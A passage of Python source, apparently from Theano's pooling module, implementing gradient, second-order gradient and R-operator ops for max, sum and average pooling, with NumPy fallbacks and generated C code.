        region_slices = [[] for i in xrange(nd)]
        region_sizes = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                if sum_mode or inc_pad:
                    start = j * stride[i]
                else:
                    # average_exc_pad: the region never covers the padding
                    start = builtins.max(j * stride[i], pad[i])
                end = builtins.min(start + ws[i], img_shp[i])
                region_slices[i].append(slice(start, end))
                region_sizes[i].append(end - start)
        # iterate over non-pooling dimensions
        region_slice = [None] * nd
        for k in np.ndindex(*x.shape[:-nd]):
            gzk = gz[k]
            gxk = gx[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                region_size = 1
                for i in xrange(nd):
                    region_slice[i] = region_slices[i][r[i]]
                    region_size *= region_sizes[i][r[i]]
                if sum_mode:
                    val = gzk[r]
                else:
                    # divide by region size
                    val = gzk[r] / region_size
                # index with a tuple of slices: indexing an ndarray with a
                # *list* of slices is deprecated since NumPy 1.15 and an
                # error in recent NumPy releases
                gxk[tuple(region_slice)] += val
        # unpad the image
        gx = gx[(slice(None),) * (len(x.shape) - nd) +
                tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))]
        gx_stg[0] = gx
    def grad(self, inp, grads):
        """Second-order gradient: pool ``ggx`` again with the same mode."""
        x, gz, ws, stride, pad = inp
        ggx, = grads
        return ([theano.tensor.zeros_like(x),
                 Pool(ignore_border=self.ignore_border,
                      ndim=self.ndim, mode=self.mode)(ggx,
                 ws, stride, pad)] + [DisconnectedType()() for i in inp[2:]])
    def connection_pattern(self, node):
        # gradients flow through x and gz only; ws/stride/pad are
        # shape parameters and therefore disconnected
        return [[1], [1], [0], [0], [0]]
    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation of the sum/average-pool gradient."""
        x, gz, ws, stride, pad = inp
        gx, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        inc_pad = int(self.mode == 'average_inc_pad')
        sum_mode = int(self.mode == 'sum')
        if self.openmp:
            # run in parallel over each pooling block
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_pad_width, r_idx, i_idx, o_idx) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        // sanity checks
        int x_typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        int gz_typenum = PyArray_ObjectType((PyObject*)%(gz)s, 0);
        if (x_typenum != gz_typenum)
        {
            PyErr_SetString(PyExc_ValueError, "input types must all match");
            %(fail)s;
        }
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(gz)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "gz must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(gz)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        if (!%(inc_pad)s && !%(sum_mode)s && nonzero_padding)
        {
            PyErr_SetString(PyExc_ValueError,
              "padding must be zero for average_exc_pad");
            %(fail)s;
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(gx)s) || !PyArray_ISCONTIGUOUS(%(gx)s)
            || *PyArray_DIMS(%(gx)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(gx)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
          Py_XDECREF(%(gx)s);
          %(gx)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(x)s), x_typenum,0);
        }
        else {
          PyArray_FILLWBYTE(%(gx)s, 0);
        }
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // padded region size
            int r_pad_width[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
            npy_intp o_idx[%(total_ndim)s];
            // placeholder for PyArray indexing (input)
            npy_intp i_idx[%(total_ndim)s];
            // loop over non-pooling dimensions
            int non_pooling_prod = 1;
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
            }
            %(omp_parallel)s
            // first loop over non-pooling dimensions
            for (int t=0; t<non_pooling_prod; t++)
            {
                // compute the non-pooling index in each dimension
                if (%(non_pool_ndim)s!=0)
                {
                    o_idx[0] = t;
                    i_idx[0] = t;
                    for (int i=1; i<%(non_pool_ndim)s; i++)
                    {
                        o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                        o_idx[i - 1] =o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                        i_idx[i] = o_idx[i];
                        i_idx[i - 1] = o_idx[i - 1];
                    }
                }

                // then loop over each region in each pooling dimension
        """
        # one nested C for-loop per pooling dimension
        for i in xrange(nd):
            ccode += """
        for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
          r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
          if (!%(sum_mode)s && !%(inc_pad)s && r_st[%(i)s] < pd[%(i)s])
          {
            r_st[%(i)s] = pd[%(i)s];
          }
          r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
          r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] ? r[%(i)s] : r_end[%(i)s];
          r_pad_width[%(i)s] = r_end[%(i)s] - r_st[%(i)s];
          // from padded_img space to img space
          r_st[%(i)s] = r_st[%(i)s] - pd[%(i)s] > 0 ? r_st[%(i)s] - pd[%(i)s] : 0;
          r_end[%(i)s] = r_end[%(i)s] > r[%(i)s] - pd[%(i)s] ? r[%(i)s] - 2 * pd[%(i)s] : r_end[%(i)s] - pd[%(i)s];
          // use the index to find the correct position in the output
          o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, sum_mode=sum_mode, inc_pad=inc_pad, non_pool_ndim=non_pool_ndim)
        ccode += """
              dtype_%(gz)s * gz;
              dtype_%(gz)s val;
              if (%(total_ndim)s == 4)
              {
                // the gradient for this region
                gz = ((dtype_%(gz)s*)(PyArray_GETPTR4(%(gz)s, o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
              }
              else
              {
                // the gradient for this region
                gz = ((dtype_%(gz)s*)(PyArray_GetPtr(%(gz)s, o_idx)));
              }
              // compute the contribution
              if (%(sum_mode)s)
              {
                val = gz[0];
              }
              else
              {
                val = gz[0] / (%(region_size)s);
              }
        """
        region_size = ' * '.join('r_pad_width[%d]' % i for i in xrange(nd))
        # inner loops over the elements of each pooling region
        for i in xrange(nd):
            ccode += """
              // go through the pooled region in the unpadded input
              for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
              {
                i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                dtype_%(gx)s * gx;
                if (%(total_ndim)s == 4)
                {
                  gx = ((dtype_%(gx)s*)(PyArray_GETPTR4(%(gx)s, i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                }
                else
                {
                  gx = ((dtype_%(gx)s*)(PyArray_GetPtr(%(gx)s, i_idx)));
                }
                gx[0] = gx[0] + val;
        """
        # close the inner region loops
        for i in xrange(nd):
            ccode += """
              } // for loop over region
            """
        # close the per-dimension region loops
        for i in xrange(nd):
            ccode += """
        } // loop over pooling dimension
        """
        ccode += """
            } // for loop over non-pooling dimensions
        } // if z_prod
        """
        return ccode % locals()
    def c_code_cache_version(self):
        # bump to invalidate previously compiled C code
        return (0, 3, self.openmp)
class DownsampleFactorMaxGradGrad(OpenMPOp):
    """Gradient of :class:`MaxPoolGrad` (second-order grad of max pooling).

    Accumulates ``ggx`` (gradient wrt MaxPoolGrad's ``gz``) at the input
    positions that attained the regional maximum, producing an output of
    the same shape as ``maxout``.
    """
    __props__ = ('ignore_border', 'mode', 'ndim')
    def __init__(self, ignore_border, mode='max', ndim=2, openmp=None):
        self.ndim = ndim
        self.ignore_border = ignore_border
        self.mode = mode
        super(DownsampleFactorMaxGradGrad, self).__init__(openmp=openmp)
        assert self.mode == 'max'
    def make_node(self, x, maxout, gz, ws, stride=None, pad=None):
        """Build the Apply node.

        ``x`` is the pooling input, ``maxout`` the pooled output and ``gz``
        here carries ``ggx``, the gradient wrt MaxPoolGrad's output.
        """
        # make_node should only be called by the grad function of
        # MaxPoolGrad, so these asserts should not fail.
        x = tensor.as_tensor_variable(x)
        maxout = tensor.as_tensor_variable(maxout)
        gz = tensor.as_tensor_variable(gz)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        assert x.ndim == maxout.ndim == gz.ndim >= nd
        if ws.dtype not in tensor.int_dtypes:
            raise TypeError('Pool downsample parameters must be ints.')
        if stride.dtype not in tensor.int_dtypes:
            raise TypeError('Stride parameters must be ints.')
        if pad.dtype not in tensor.int_dtypes:
            raise TypeError('Padding parameters must be ints.')
        return Apply(self, [x, maxout, gz, ws, stride, pad], [x.type()])
    def perform(self, node, inp, out):
        """Python (NumPy) implementation of the second-order max-pool grad."""
        x, maxout, ggx, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'DownsampleFactorMaxGradGrad requires input '
                'with {} or more dimensions'.format(nd))
        if (z[0] is None) or (z[0].shape != maxout.shape):
            z[0] = np.zeros(maxout.shape, dtype=x.dtype)
        else:
            # Output storage may be reused across calls; clear it so the
            # `+=` accumulation below starts from zero.  The C code does
            # the same with PyArray_FILLWBYTE on the reuse path.
            z[0].fill(0)
        ggz = z[0]  # grad wrt maxout_grad has the same shape as maxout
        # size of pooling output
        pool_out_shp = ggz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        # pad the image and its gradients
        if max(pad) > 0:
            y_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y_padded[(slice(None),) * (len(x.shape) - nd) +
                     tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
            ggx_padded = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            ggx_padded[(slice(None),) * (len(x.shape) - nd) +
                       tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ggx
        else:
            y_padded = x
            ggx_padded = ggx
        # precompute the region boundaries for each dimension
        region_ranges = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = j * stride[i]
                end = builtins.min(start + ws[i], img_shp[i])
                region_ranges[i].append(xrange(start, end))
        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            ggxk = ggx_padded[k]
            ggzk = ggz[k]
            yk = y_padded[k]
            maxoutk = maxout[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                # iterate inside region
                maxout_value = maxoutk[r]
                for c in itertools.product(*[region_ranges[i][r[i]]
                                             for i in xrange(nd)]):
                    # every tie with the maximum contributes
                    if maxout_value == yk[c]:
                        ggzk[r] += ggxk[c]
    def infer_shape(self, node, in_shapes):
        # output has the shape of maxout (the pooled output)
        return [in_shapes[1]]
    def grad(self, inp, grads):
        """Third-order gradient; shape parameters are disconnected."""
        x, maxout, ggx, ws, stride, pad = inp
        gz, = grads
        return [theano.tensor.zeros_like(x),
                theano.tensor.zeros_like(maxout),
                MaxPoolGrad(ignore_border=self.ignore_border,
                            ndim=self.ndim)(x, maxout, gz,
                                            ws, stride, pad),
                DisconnectedType()(),
                DisconnectedType()(),
                DisconnectedType()()]
    def connection_pattern(self, node):
        # gradients flow through x, maxout and ggx only
        return [[1], [1], [1], [0], [0], [0]]
    def c_code(self, node, name, inp, out, sub):
        """Generate the C implementation (max mode only)."""
        if self.mode != 'max':
            raise theano.gof.utils.MethodNotDefined()
        x, maxout, ggx, ws, stride, pad = inp
        z, = out  # the grad of grad
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        if self.openmp:
            # run in parallel over each pooling block
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, maximum) schedule(static)'
        else:
            omp_parallel = ''
        ccode = """
        int z_typenum = PyArray_ObjectType((PyObject*)%(maxout)s, 0);
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            z[i] = PyArray_DIMS(%(maxout)s)[%(non_pool_ndim)s + i];
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
        }
        // allocating memory for output, if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(z)s) || !PyArray_ISCONTIGUOUS(%(z)s)
            || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(total_ndim)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(maxout)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
          Py_XDECREF(%(z)s);
          %(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, PyArray_DIMS(%(maxout)s), z_typenum,0);
        }
        else {
          PyArray_FILLWBYTE(%(z)s, 0);
        }
        dtype_%(maxout)s maximum; // temp var for maximum value in a region
        // will be used to hold start and end index of a region
        int r_st[%(nd)s];
        int r_end[%(nd)s];
        // index for iterating over the pooling regions
        int r_idx[%(nd)s];
        // placeholder for PyArray indexing (output)
        npy_intp o_idx[%(total_ndim)s];
        // placeholder for PyArray indexing (input)
        npy_intp i_idx[%(total_ndim)s];
        // loop over non-pooling dimensions
        int non_pooling_prod;
        non_pooling_prod = 1;
        for (int i=0; i<%(non_pool_ndim)s; i++)
        {
            non_pooling_prod *= PyArray_DIMS(%(x)s)[i];
        }
        %(omp_parallel)s
        // first loop over non-pooling dimensions
        for (int t=0; t<non_pooling_prod; t++)
        {
            // compute the non-pooling index in each dimension
            if (%(non_pool_ndim)s!=0)
            {
                o_idx[0] = t;
                i_idx[0] = t;
                for (int i=1; i<%(non_pool_ndim)s; i++)
                {
                    o_idx[i] = o_idx[i - 1] / PyArray_DIMS(%(x)s)[i - 1];
                    o_idx[i - 1] = o_idx[i - 1] %% PyArray_DIMS(%(x)s)[i - 1];
                    i_idx[i] = o_idx[i];
                    i_idx[i - 1] = o_idx[i - 1];
                }
            }

            // then loop over each region in each pooling dimension
        """
        # one nested C for-loop per pooling dimension
        for i in xrange(nd):
            ccode += """
        for (r_idx[%(i)s]=0; r_idx[%(i)s] < z[%(i)s]; r_idx[%(i)s]++) {
          r_st[%(i)s] = r_idx[%(i)s] * st[%(i)s];
          r_end[%(i)s] = r_st[%(i)s] + ws[%(i)s];
          // skip the padding
          r_st[%(i)s] = r_st[%(i)s] < pd[%(i)s] ? pd[%(i)s] : r_st[%(i)s];
          r_end[%(i)s] = r_end[%(i)s] > (r[%(i)s] - pd[%(i)s]) ? r[%(i)s] - pd[%(i)s] : r_end[%(i)s];
          // from padded_img space to img space
          r_st[%(i)s] -= pd[%(i)s];
          r_end[%(i)s] -= pd[%(i)s];
          // use the index to find the correct position in the output
          o_idx[%(non_pool_ndim)s + %(i)s] = r_idx[%(i)s];
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
              dtype_%(z)s * z;
              if (%(total_ndim)s == 4)
              {
                // the maximum value
                maximum = ((dtype_%(maxout)s*)(PyArray_GETPTR4(%(maxout)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])))[0];
                // z at this position
                z = ((dtype_%(z)s*)(PyArray_GETPTR4(%(z)s,o_idx[0],o_idx[1],o_idx[2],o_idx[3])));
              }
              else
              {
                // the maximum value
                maximum = ((dtype_%(maxout)s*)(PyArray_GetPtr(%(maxout)s,o_idx)))[0];
                // z at this position
                z = ((dtype_%(z)s*)(PyArray_GetPtr(%(z)s,o_idx)));
              }
        """
        # inner loops over the elements of each pooling region
        for i in xrange(nd):
            ccode += """
              // go through the pooled region in the unpadded input
              for(int m%(i)s=r_st[%(i)s]; m%(i)s<r_end[%(i)s]; m%(i)s++)
              {
                i_idx[%(non_pool_ndim)s + %(i)s] = m%(i)s;
            """ % dict(i=i, non_pool_ndim=non_pool_ndim)
        ccode += """
                dtype_%(x)s a;
                dtype_%(ggx)s * ggx;
                if (%(total_ndim)s == 4)
                {
                  a = ((dtype_%(x)s*)(PyArray_GETPTR4(%(x)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])))[0];
                  ggx = ((dtype_%(ggx)s*)(PyArray_GETPTR4(%(ggx)s,i_idx[0],i_idx[1],i_idx[2],i_idx[3])));
                }
                else
                {
                  a = ((dtype_%(x)s*)(PyArray_GetPtr(%(x)s,i_idx)))[0];
                  ggx = ((dtype_%(ggx)s*)(PyArray_GetPtr(%(ggx)s,i_idx)));
                }
                if (a == maximum){
                  z[0] += ggx[0];
                }
        """
        # close the inner region loops
        for i in xrange(nd):
            ccode += """
              } // for loop over region
            """
        # close the per-dimension region loops
        for i in xrange(nd):
            ccode += """
        } // loop over pooling dimension
        """
        ccode += """
        } // for loop over non-pooling dimensions
        """
        return ccode % locals()
    def c_code_cache_version(self):
        # bump to invalidate previously compiled C code
        return (0, 4, self.openmp)
class MaxPoolRop(OpenMPOp):
    """
    Implements the R-operator for the downsample operation.

    Parameters
    ----------
    ws : list or tuple of N ints
        Downsample factor over rows, columns etc.
        ws indicates the size of the pooling region.
    ignore_border : bool
        If ws doesn't divide imgshape, do we include an extra row/col/slice
        of partial downsampling (False) or ignore it (True).
    stride : list or tuple of N ints or None
        Stride size, which is the number of shifts over rows/cols/slices to get the
        next pool region. If stride is None, it is considered equal to ws
        (no overlap on pooling regions).
    pad : tuple of N ints or None
        For each downsampling dimension, this specifies the number of zeros to
        add as padding on both sides. For 2D and (pad_h, pad_w), pad_h specifies the
        size of the top and bottom margins, pad_w specifies the size of the left and
        right margins. No padding is added if pad is None.
    mode : {'max', 'sum', 'average_inc_pad', 'average_exc_pad'}
        ('average_inc_pad' excludes the padding from the count,
        'average_exc_pad' include it)
    ndim : int
        The number of pooling dimensions N.
        The default is 2.
    """

    __props__ = ('ignore_border', 'mode', 'ndim')
    params_type = ParamsType(ignore_border=bool_t,)

    def __init__(self, ignore_border=False, mode='max', ndim=2, openmp=None):
        super(MaxPoolRop, self).__init__(openmp=openmp)
        self.ndim = ndim
        self.ignore_border = ignore_border
        self.mode = mode
        # Only the R-op of max-pooling is implemented by this Op.
        assert mode == 'max'

    def make_node(self, x, eval_point, ws, stride=None, pad=None):
        """Build the Apply node; `eval_point` is the R-op evaluation point.

        The output dtype follows `eval_point`, not `x`, since the result is
        a selection of eval-point values at the argmax positions.
        """
        # TODO: consider restricting the dtype?
        x = tensor.as_tensor_variable(x)
        eval_point = tensor.as_tensor_variable(eval_point)
        nd = self.ndim
        if stride is None:
            stride = ws
        if pad is None:
            pad = (0,) * nd
        elif isinstance(pad, (tuple, list)):
            if max(pad) != 0 and not self.ignore_border:
                raise NotImplementedError(
                    'padding works only with ignore_border=True')
            if isinstance(ws, (tuple, list)):
                if any(pad[i] >= ws[i] for i in range(nd)):
                    raise NotImplementedError(
                        'padding must be smaller than strides')
        ws = tensor.as_tensor_variable(ws)
        stride = tensor.as_tensor_variable(stride)
        pad = tensor.as_tensor_variable(pad)
        assert ws.ndim == 1
        assert stride.ndim == 1
        assert pad.ndim == 1
        if x.type.ndim < nd:
            raise TypeError()
        if not ws.dtype.startswith('int'):
            raise TypeError('Pool downsample parameters must be ints.')
        if not stride.dtype.startswith('int'):
            raise TypeError('Stride parameters must be ints.')
        if not pad.dtype.startswith('int'):
            raise TypeError('Padding parameters must be ints.')
        # If the input shape are broadcastable we can have 0 in the output shape
        broad = x.broadcastable[:-nd] + (False,) * nd
        out = tensor.TensorType(eval_point.dtype, broad)
        return gof.Apply(self, [x, eval_point, ws, stride, pad], [out()])

    def perform(self, node, inp, out, params):
        """Python fallback: for each pooling region, output the eval-point
        value located at the argmax of `x` within that region.
        """
        x, ex, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        assert ws.shape == stride.shape == pad.shape == (nd,)
        if len(x.shape) < nd:
            raise NotImplementedError(
                'Pool requires input with {} or more dimensions'.format(nd))
        z_shape = Pool.out_shape(x.shape, ws, params.ignore_border, stride, pad, nd)
        if not self.ignore_border:
            assert all(z > 0 for z in z_shape[-nd:])
        if (z[0] is None) or (z[0].shape != z_shape):
            z[0] = np.empty(z_shape, dtype=x.dtype)
        zz = z[0]
        # size of pooling output
        pool_out_shp = zz.shape[-nd:]
        img_shp = tuple(x.shape[-nd + i] + 2 * pad[i] for i in xrange(nd))
        inc_pad = self.mode == 'average_inc_pad'

        # pad the image and the eval point
        if max(pad) != 0:
            y = np.zeros(x.shape[:-nd] + img_shp, dtype=x.dtype)
            y[(slice(None),) * (len(x.shape) - nd) +
              tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = x
            ey = np.zeros(ex.shape[:-nd] + img_shp, dtype=ex.dtype)
            ey[(slice(None),) * (len(ex.shape) - nd) +
               tuple(slice(pad[i], img_shp[i] - pad[i]) for i in xrange(nd))] = ex
        else:
            y = x
            ey = ex

        # precompute the region boundaries for each dimension
        region_slices = [[] for i in xrange(nd)]
        for i in xrange(nd):
            for j in xrange(pool_out_shp[i]):
                start = j * stride[i]
                end = builtins.min(start + ws[i], img_shp[i])
                if not inc_pad:
                    start = builtins.max(start, pad[i])
                    end = builtins.min(end, img_shp[i] - pad[i])
                region_slices[i].append(slice(start, end))

        # iterate over non-pooling dimensions
        for k in np.ndindex(*x.shape[:-nd]):
            zzk = zz[k]
            yk = y[k]
            eyk = ey[k]
            # iterate over pooling regions
            for r in np.ndindex(*pool_out_shp):
                # FIX: index with a *tuple* of slices.  Indexing with a
                # list of slices was deprecated in NumPy 1.15 and raises
                # in later versions.
                region = tuple(region_slices[i][r[i]] for i in xrange(nd))
                # current slice in padded input
                ykslice = yk[region]
                # current slice in eval points
                eykslice = eyk[region]
                # indices of maximum
                idx = np.unravel_index(np.argmax(ykslice), ykslice.shape)
                zzk[r] = eykslice[idx]

    def c_headers(self):
        # std::max is used in the generated code.
        headers = ['<algorithm>']
        headers += super(MaxPoolRop, self).c_headers()
        return headers

    def c_code(self, node, name, inp, out, sub):
        """Generate C code implementing `perform` (max mode only)."""
        if self.mode != 'max':
            raise theano.gof.utils.MethodNotDefined()
        x, ex, ws, stride, pad = inp
        z, = out
        nd = self.ndim
        total_ndim = node.inputs[0].ndim
        non_pool_ndim = total_ndim - nd
        fail = sub['fail']
        params = sub['params']

        if self.openmp:
            # run in parallel over each pooling block
            omp_parallel = '#pragma omp parallel for private(r_st, r_end, r_idx, i_idx, o_idx, collector, eval_collector) schedule(static)'
        else:
            omp_parallel = ''

        # Argument validation, output-shape computation and (re)allocation.
        ccode = """
        int typenum = PyArray_ObjectType((PyObject*)%(x)s, 0);
        if(PyArray_NDIM(%(x)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "x must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_NDIM(%(ex)s)!=%(total_ndim)s)
        {
            PyErr_SetString(PyExc_ValueError, "eval_point must be a %(total_ndim)sD ndarray");
            %(fail)s;
        }
        if(PyArray_DIM(%(ws)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "ws must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(stride)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "stride must be a vector of size %(nd)s");
            %(fail)s;
        }
        if(PyArray_DIM(%(pad)s, 0)!=%(nd)s)
        {
            PyErr_SetString(PyExc_ValueError, "pad must be a vector of size %(nd)s");
            %(fail)s;
        }
        int z[%(nd)s]; // shape of the output
        int r[%(nd)s]; // shape of the padded_input
        int ws[%(nd)s];
        int st[%(nd)s];
        int pd[%(nd)s];
        int nonzero_padding;
        nonzero_padding = 0;
        for (int i=0; i<%(nd)s; i++)
        {
            ws[i] = *((npy_intp*)PyArray_GETPTR1(%(ws)s, i));
            st[i] = *((npy_intp*)PyArray_GETPTR1(%(stride)s, i));
            pd[i] = *((npy_intp*)PyArray_GETPTR1(%(pad)s, i));
            r[i] = PyArray_DIMS(%(x)s)[%(non_pool_ndim)s + i] + 2 * pd[i];
            if (pd[i]>0)
                nonzero_padding = 1;
        }
        if (!%(params)s->ignore_border && nonzero_padding)
        {
            PyErr_SetString(PyExc_ValueError,
              "padding must be zero when ignore border is False");
            %(fail)s;
        }
        if (%(params)s->ignore_border)
        {
            for (int i=0; i<%(nd)s; i++)
            {
                // '/' in C is different from '/' in python
                if (r[i] - ws[i] < 0)
                {
                    z[i] = 0;
                }
                else
                {
                    z[i] = (r[i] - ws[i]) / st[i] + 1;
                }
            }
        }
        else
        {
            for (int i=0; i<%(nd)s; i++)
            {
                // decide how many rows/cols the output has
                if (st[i] >= ws[i])
                {
                    z[i] = (r[i] - 1) / st[i] + 1;
                }
                else
                {
                    z[i] = std::max(0, (r[i] - 1 - ws[i] + st[i]) / st[i]) + 1;
                }
                assert(z[i] > 0);
            }
        }
        // memory allocation of z if necessary
        int mem_nec;
        mem_nec = 0;
        if ((!%(z)s) || *PyArray_DIMS(%(z)s)!=%(total_ndim)s)
        {
            mem_nec = 1;
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(non_pool_ndim)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[i] != PyArray_DIMS(%(x)s)[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (!mem_nec)
        {
            for (int i=0; i<%(nd)s; i++)
            {
                if (PyArray_DIMS(%(z)s)[%(non_pool_ndim)s + i] != z[i])
                {
                    mem_nec = 1;
                    break;
                }
            }
        }
        if (mem_nec)
        {
          if (%(z)s) Py_XDECREF(%(z)s);
          npy_intp dims[%(total_ndim)s];
          for (int i=0; i<%(non_pool_ndim)s; i++)
          {
              dims[i] = PyArray_DIMS(%(x)s)[i];
          }
          for (int i=0; i<%(nd)s; i++)
          {
              dims[%(non_pool_ndim)s + i] = z[i];
          }
          //TODO: zeros not necessary
          %(z)s = (PyArrayObject*) PyArray_ZEROS(%(total_ndim)s, dims, typenum,0);
        }
        // initialize temp var for the value in a region
        dtype_%(x)s collector;
        dtype_%(ex)s eval_collector;
        int z_prod;
        // do not run if any z[i] is zero
        z_prod = 1;
        for (int i=0; i<%(nd)s; i++)
        {
            z_prod *= z[i];
        }
        if (z_prod)
        {
            // will be used to hold start and end index of a region
            int r_st[%(nd)s];
            int r_end[%(nd)s];
            // index for iterating over the pooling regions
            int r_idx[%(nd)s];
            // placeholder for PyArray indexing (output)
